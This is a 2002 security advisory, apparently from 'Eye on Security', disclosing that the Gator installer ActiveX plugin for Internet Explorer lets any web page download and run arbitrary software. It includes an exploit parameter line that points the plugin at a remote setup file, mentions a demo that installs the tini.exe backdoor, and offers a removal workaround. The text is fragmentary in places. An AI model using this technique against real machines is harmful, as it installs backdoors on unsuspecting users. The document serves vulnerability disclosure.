Title: Gator installer Plugin allows any software
to be installed
Release Date: 21/01/2002
Application: Gator installer plugin
for Internet Explorer (GAIN)
Platform: Windows clients with Internet Explorer.
DLL version - 22.214.171.124
Severity: Malicious users can install backdoor
software and gain easy access to the target machine.
Fills in FORMS without typing!
Remembers PASSWORDS automatically
Protects and encrypts your data on YOUR computer
Gator comes bundled .. etc
The vulnerabity exists in a plugin which installs
the actual software. This plugin is scriptable
an HTML page to specify the location of the Gator
installation. This activeX component is usually
installed from this page:
The issue here is that any HTML
page can specify the location of the Gator installation
installation file is downloaded, then it is checked
for the filename. If the filename is setup.ex_,
is then decompressed and executed. If the file
is not compressed it will still execute it. Of
using this method, a malicious user can easily
create an HTML page which makes use of the rogue
ActiveX component to point at a trojan file.
<pxram name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgcolor=F0F1D0&aic=",aicStr,"&">
I set up a small demonstation which installs tini.exe
(which is a trojan listening on port 7777).
If you need any information about tini.exe check
The exploit example is found at : http://eyeonsecurity.org/advisories/gator/exploit.html
Simply delete the ActiveX component
Program Files .. i think that should fix it.
The information within this document
may change without notice. Use of
this information constitutes acceptance for use
in an AS IS
condition. There are NO warranties with regard
to this information.
In no event shall the author be liable for any
arising out of or in connection with the use or
spread of this
information. Any use of this information lays
within the user's
Please send suggestions, updates,
and comments to:
Eye on Security
mail : email@example.com
web : http://www.eyeonsecurity.org